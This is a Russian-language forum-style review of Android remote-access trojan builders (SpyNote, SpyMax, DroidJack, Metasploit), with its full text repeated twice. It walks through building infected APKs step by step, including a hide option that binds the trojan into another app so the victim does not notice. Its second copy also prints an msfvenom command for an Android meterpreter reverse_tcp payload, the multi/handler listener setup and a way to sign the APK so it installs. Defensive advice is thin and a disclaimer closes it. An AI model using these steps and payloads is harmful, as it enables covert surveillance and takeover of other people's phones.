Давайте разберёмся, что такое RAT.
RAT - аббревиатура, от Remote Administration Tool. В дословном переводе - Утилита для удалённого администрирования. В идеальных условиях представляет из себя программное обеспечение, что зачастую представлено в схеме “Клиент- Сервер”, например Team Viewer.
Но коль есть возможность управлять удалённо устройством, хакеры спать не могли и после этого появились всем знакомые и простые до боли NJRAT, Comet и тому подобные.
Итак, рассмотрим самые часто используемые программы для создания вирусного ПО на ваши мобилки, а именно:
SpyNote
SpyMax
DroidJack
AhMoth
MultiHandler
И будут они разобраны и проанализированы по следующим критериям:
Краткая история о программном обеспечении;
Мануал по использованию;
Особенности и недостатки и отчёт VT;
Способы защиты и выводы;
Первым в списке оказался SpyNote.
Никакой истории написания и авторов найти не удалось, только короткие инструкции по использованию подобных вещей, которые трудно назвать благоразумными. В англоязычном гугле и прочих поисковиках - ничего не нашёл. Автор или специально запутал и затёр свои следы или их убрали другие пользователи.
Переходим к краткому руководству по использованию этого чуда. Тесты проводились на моих устройствах и никто, кроме моего мозга и рассудка не пострадал. Итак, всё равносильно действиям с NJRAT, принцип их работы по сути один - установка сессии через заражённый файл к клиенту у вас.
Открываем нашу программу и переходим во вкладку “Bulid Client”, в которой устанавливаем иконку, названия и версию. После чего переходим в раздел “Dynamic Adress”, что отвечает за адрес нашего устройства, с которого создан этот чудесный бэкдор. Исходя из того, что работать будем в локальной сети, нет смысла регистрировать динамический IP на специальных ресурсах, для превращения его в статический. Всё стандартно, вписываем IP и порт, кликаем после этого на кнопочку “add”. На этом настройки в этой вкладке окончены. Переходим в следующую, где можно выставить особенности нашего вируса, с вашего позволения буду его так называть. Для некоторых требуются права супер юзера на устройстве жертвы, после кликаем на "Build" и ждём несколько минут. После чего видим APK в корневой папке.
Среди основного функционала хотелось бы отметить такие особенности, как:
Возможность записи с микрофона;
Возможность открыть shell linux’a;
Менеджер файлов и контактов;
Среди недостатков хотелось бы отметить маленький и ужатый функционал по отношению к другим приложениям. Ну и конечно-же высокий коэффициент обнаружения вирусных сигнатур антивирусами. Исходя из суждения о том, что на Android вирусов нет и антивирус не нужен, большинство устройств уязвимы. На новых устройствах, где есть ограничитель фонового трафика, сессия не отмечалась стабильностью и спустя несколько минут сходила на нет.
Cо способами защиты всё ясно, это примитивное троянское программное обеспечение, что показало процент обнаружения в соотношении 24\60, исходя с чего обычным антивирусом возможно защититься от подобной дряни.
SpyMAX.
Закрадывается мысль о том, что авторы предыдущего программного обеспечения и этого одни и те же. SpyMAX можно назвать расширенной версией, о чём намекает само название. Есть некоторые отличия в работе, например, требования установки Java. В интернете отсутствует подробная информация о SpyMAX.
Здесь всё просто и понятно, справился даже ребёнок. Не исключаю, что читают это люди не образованные в этой сфере, поэтому распишу всё подробно. Для начала открываем нашу программку, кликаем на "Build", затем прописываем наш IP. После чего потребуется установленный пакет Java. В следующем разделе указываем путь к директории Bin в папке Java. Дальше всё по классике, выставляем название, иконку и тип приложения. Спустя несколько секунд жмем на OK, после чего откроется подобие командной строки, в которой будет отражен процесс создания APK приложения.
Имеет внушительный функционал, по сравнению со SpyNote. Для некоторых действий требуются права root и полный пакет Java. Сессия не выделилась стабильностью, так-как на новых версиях Андроид есть ограничитель фонового трафика. Процент выявления составил 30/60, что больше чем у предыдущего билдера. В некоторых случаях нужна подпись АПК файла, о которой я уже говорил.
Основным способом защиты является хороший антивирус с актуальными базами.
DroidJack.
Опять же… Не удалось найти автора, лично мне известно только то, что это ПО одно из самых дорогих на чёрном рынке. В контактах значится Sankevee.
По традиции открываем наше чудо и выставляем порт для работы. Перейдя в вкладку Generate, замечаем оповещение о том, что IP адрес здесь не подойдёт и нужно использовать только Dynamic DNS, что собственно я и сделаю. После выставляем имя и прочую информацию о файле, жмём на галочку напротив надписи Hide и есть возможность слить наш вирус в единое с каким-то приложениям. При включенном скрытом режиме жертва не будет подозревать об установке на её мобильное устройство вредоносного ПО.
Среди недостатков отмечу наличие сигнатур этого приложения в базах антивируса, в остальном он неплох. Процент обнаружения составил 23/60. Приложения платное и стоит около 200$ на чёрном рынке. Так-же есть куча расширенных опций в окошке Advanced.
Собственная внимательность и дотошность помогут вам в обнаружении этого всего. Используйте антивирус как вспомогательное средство.
MultiHandler.
Это тот эксплоит, о котором можно говорить вечно. Его возможности ограничены только нашей фантазией и поэтому я не мог написать не задев его великой личности. Итак, для начала нам понадобится сгенерировать наш пэйлоад. Делается это командой:
Код:
"Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия Meterpreter.
Глобальные выводы.
Нет смысла затягивать и подробно разъяснять и без того ясные вещи. Способы не идеальны и защитой могут служить светлая голова и осведомлённость. Установите антивирус. Вирусы на андроид есть, не забывайте о этом. Приложения в обзоре представлены в ознакомительных целях. Давайте будем умнее мошенников.
RAT - аббревиатура, от Remote Administration Tool. В дословном переводе - Утилита для удалённого администрирования. В идеальных условиях представляет из себя программное обеспечение, что зачастую представлено в схеме “Клиент- Сервер”, например Team Viewer.
Но коль есть возможность управлять удалённо устройством, хакеры спать не могли и после этого появились всем знакомые и простые до боли NJRAT, Comet и тому подобные.
Итак, рассмотрим самые часто используемые программы для создания вирусного ПО на ваши мобилки, а именно:
SpyNote
SpyMax
DroidJack
AhMoth
MultiHandler
И будут они разобраны и проанализированы по следующим критериям:
Краткая история о программном обеспечении;
Мануал по использованию;
Особенности и недостатки и отчёт VT;
Способы защиты и выводы;
Первым в списке оказался SpyNote.
Никакой истории написания и авторов найти не удалось, только короткие инструкции по использованию подобных вещей, которые трудно назвать благоразумными. В англоязычном гугле и прочих поисковиках - ничего не нашёл. Автор или специально запутал и затёр свои следы или их убрали другие пользователи.
Переходим к краткому руководству по использованию этого чуда. Тесты проводились на моих устройствах и никто, кроме моего мозга и рассудка не пострадал. Итак, всё равносильно действиям с NJRAT, принцип их работы по сути один - установка сессии через заражённый файл к клиенту у вас.
Открываем нашу программу и переходим во вкладку “Bulid Client”, в которой устанавливаем иконку, названия и версию. После чего переходим в раздел “Dynamic Adress”, что отвечает за адрес нашего устройства, с которого создан этот чудесный бэкдор. Исходя из того, что работать будем в локальной сети, нет смысла регистрировать динамический IP на специальных ресурсах, для превращения его в статический. Всё стандартно, вписываем IP и порт, кликаем после этого на кнопочку “add”. На этом настройки в этой вкладке окончены. Переходим в следующую, где можно выставить особенности нашего вируса, с вашего позволения буду его так называть. Для некоторых требуются права супер юзера на устройстве жертвы, после кликаем на "Build" и ждём несколько минут. После чего видим APK в корневой папке.
Среди основного функционала хотелось бы отметить такие особенности, как:
Возможность записи с микрофона;
Возможность открыть shell linux’a;
Менеджер файлов и контактов;
Среди недостатков хотелось бы отметить маленький и ужатый функционал по отношению к другим приложениям. Ну и конечно-же высокий коэффициент обнаружения вирусных сигнатур антивирусами. Исходя из суждения о том, что на Android вирусов нет и антивирус не нужен, большинство устройств уязвимы. На новых устройствах, где есть ограничитель фонового трафика, сессия не отмечалась стабильностью и спустя несколько минут сходила на нет.
Cо способами защиты всё ясно, это примитивное троянское программное обеспечение, что показало процент обнаружения в соотношении 24\60, исходя с чего обычным антивирусом возможно защититься от подобной дряни.
SpyMAX.
Закрадывается мысль о том, что авторы предыдущего программного обеспечения и этого одни и те же. SpyMAX можно назвать расширенной версией, о чём намекает само название. Есть некоторые отличия в работе, например, требования установки Java. В интернете отсутствует подробная информация о SpyMAX.
Здесь всё просто и понятно, справился даже ребёнок. Не исключаю, что читают это люди не образованные в этой сфере, поэтому распишу всё подробно. Для начала открываем нашу программку, кликаем на "Build", затем прописываем наш IP. После чего потребуется установленный пакет Java. В следующем разделе указываем путь к директории Bin в папке Java. Дальше всё по классике, выставляем название, иконку и тип приложения. Спустя несколько секунд жмем на OK, после чего откроется подобие командной строки, в которой будет отражен процесс создания APK приложения.
Имеет внушительный функционал, по сравнению со SpyNote. Для некоторых действий требуются права root и полный пакет Java. Сессия не выделилась стабильностью, так-как на новых версиях Андроид есть ограничитель фонового трафика. Процент выявления составил 30/60, что больше чем у предыдущего билдера. В некоторых случаях нужна подпись АПК файла, о которой я уже говорил.
Основным способом защиты является хороший антивирус с актуальными базами.
DroidJack.
Опять же… Не удалось найти автора, лично мне известно только то, что это ПО одно из самых дорогих на чёрном рынке. В контактах значится Sankevee.
По традиции открываем наше чудо и выставляем порт для работы. Перейдя в вкладку Generate, замечаем оповещение о том, что IP адрес здесь не подойдёт и нужно использовать только Dynamic DNS, что собственно я и сделаю. После выставляем имя и прочую информацию о файле, жмём на галочку напротив надписи Hide и есть возможность слить наш вирус в единое с каким-то приложениям. При включенном скрытом режиме жертва не будет подозревать об установке на её мобильное устройство вредоносного ПО.
Среди недостатков отмечу наличие сигнатур этого приложения в базах антивируса, в остальном он неплох. Процент обнаружения составил 23/60. Приложения платное и стоит около 200$ на чёрном рынке. Так-же есть куча расширенных опций в окошке Advanced.
Собственная внимательность и дотошность помогут вам в обнаружении этого всего. Используйте антивирус как вспомогательное средство.
MultiHandler.
Это тот эксплоит, о котором можно говорить вечно. Его возможности ограничены только нашей фантазией и поэтому я не мог написать не задев его великой личности. Итак, для начала нам понадобится сгенерировать наш пэйлоад. Делается это командой:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.43.211 lport=8888 > /root/file.apk
Затем осталось только и настроить слушатель под указанный IP и пэйлоад.
Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.211
set lport 8888
exploit
После устанавливаем APK-шку на андроид, но видим следующее: "Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия Meterpreter.
Глобальные выводы.
Нет смысла затягивать и подробно разъяснять и без того ясные вещи. Способы не идеальны и защитой могут служить светлая голова и осведомлённость. Установите антивирус. Вирусы на андроид есть, не забывайте о этом. Приложения в обзоре представлены в ознакомительных целях. Давайте будем умнее мошенников.
